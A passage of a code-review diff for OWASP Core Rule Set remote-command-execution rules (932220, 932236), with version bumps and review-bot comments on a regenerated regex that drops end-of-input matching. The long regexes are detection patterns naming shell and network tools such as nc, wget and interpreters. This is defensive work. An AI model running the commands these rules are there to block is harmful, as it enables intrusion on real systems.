(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'[^']*'|\"[^\"]*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:7[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[arx][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?|(?:G[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?E[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?T|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[89][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?9|[au][\"'\)\[\x5c]*(?:(?
:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t|c|(?:m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?p|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[dfu]|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[gr])|f[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[cgi]|m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p)|h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:d|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p)|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[dp]|r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b)|j[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:j[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s|q)|k[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r|v)|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[cl]|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t|(?:p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?m)|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[cr]|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@
_a-\{]*)?\x5c?l|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[ex]|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c|o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p)|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:3[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m|c)|x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|z)|y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m)|z[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h))[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:(?:[bdx]|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|q[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?)|l[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?
@_a-\{]*)?\x5c?)?|(?:[nps]|u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?|z[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:4[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?)|r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[dv]|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?|m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?)|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[dt]|[ghu]|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?))[\s\x0b&\),<>\|].*|a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?-[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[&\),<>\|]{1,10}|(?:[\-\.0-9A-Z_a-z][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?){1,10}[\s\x0b&\),<>\|\}]{1,10})|(?:(?:b|(?:p[\"'\)\[\x5c]*(?:(?:(?:\|\|
|&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?t|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[ks])[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?|r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[jp][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?|s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?)[\s\x0b&\),<>\|].*)|g[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[&\),<>\|]{1,10}|(?:[\-\.0-9A-Z_a-z][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?){1,10}[\s\x0b&\),<>\|\}]{1,10})|(?:d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m|[hr][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t|o|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?g)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*)|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:(?:(?:[at][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|d[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b|f|(?:k[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?g|h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|x[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?z)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*
)?\x5c?|r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?)?)[\s\x0b&\),<>\|].*|i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?[\s\x0b&\),<>\|].*|p[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|].*|[&\),<>\|]{1,10}|(?:[\-\.0-9A-Z_a-z][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?){1,10}[\s\x0b&\),<>\|\}]{1,10}))))" \ "id:932220,\ phase:2,\ block,\ @@ -1253,7 +1325,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i).\ tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-RCE',\ tag:'capec/1000/152/248/88',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -1275,6 +1347,8 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i).\ # # .932250 (base rule, PL1, targets two and three character commands) # .932260 (base rule, PL1, targets known command word of length > 3 without evasion) +# .932340 (PL-1, matches commands with no arguments) +# .932350 (PL-3, matches commands with no arguments) # # .932240 (generic detection, PL2, targets generic evasion attempts) # .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2, @@ -1316,7 +1390,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS|XML:/* "@rx (?i)[\-0-9_a-z]+( tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-RCE',\ tag:'capec/1000/152/248/88',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.932240_matched_var_name=%{matched_var_name}',\ chain" 
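Review bot: The regenerated 932220 regex drops every end-of-input alternative — `(?:[\s\x0b&\),<>\|]|$).*` becomes `[\s\x0b&\),<>\|].*` and `(?:[&\),<>\|]|$){1,10}` becomes `[&\),<>\|]{1,10}` — so a command word that is the last thing in the inspected value no longer matches this rule; presumably that coverage moves to the 932340/932350 rules named in the comment hunks that follow, but nothing in this hunk records that dependency. The command list also changes in both directions (`GET`, `dir`, `ed`, `id`, `php`, `yes` appear; `fd`, `tcp`, `udp` disappear), and since only the generated output is touched here, the regex-assembly source for 932220 and its tests should be checked to change in step. I would add under `# crs-toolchain regex update 932220` a line such as `# Commands at the very end of the payload (no trailing separator) are covered by 932340/932350, not here.`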
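Review bot: The two added list entries write the paranoia level as `PL-1`/`PL-3` while every neighbouring entry in the same list uses the `PL1`/`PL2` form, and they omit the role phrase (`base rule`, `generic detection`) the other entries carry; the same two lines are added again in the hunk at `@@ -1560,6 +1634,8 @@`. I would write them as `# .932340 (base rule, PL1, targets commands with no arguments)` and `# .932350 (PL3, targets commands with no arguments)` in both places.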
@@ -1355,7 +1429,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \{[^\s
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-RCE',\
 tag:'capec/1000/152/248/88',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -1393,7 +1467,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx ;[\s\x
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-RCE',\
 tag:'capec/1000/152/248/88',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -1429,7 +1503,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx ~[0-9]
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-RCE',\
 tag:'capec/1000/152/248/88',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -1471,7 +1545,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\r
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-RCE',\
 tag:'capec/137/134',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -1504,7 +1578,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?is)\
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-RCE',\
 tag:'capec/137/134',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -1539,7 +1613,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?is)\
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-RCE',\
 tag:'capec/137/134',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -1560,6 +1634,8 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?is)\
 #
 # .932250 (base rule, PL1, targets two and three character commands)
 # .932260 (base rule, PL1, targets known command word of length > 3 without evasion)
+# .932340 (PL-1, matches commands with no arguments)
+# .932350 (PL-3, matches commands with no arguments)
 #
 # .932240 (generic detection, PL2, targets generic evasion attempts)
 # .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2,
@@ -1585,7 +1661,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?is)\ # (consult https://coreruleset.org/docs/development/regex_assembly/ for details): # crs-toolchain regex update 932236 # -SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:^|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|(?:c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h)[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:[\s\x0b&\),<>\|]|$).*|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:
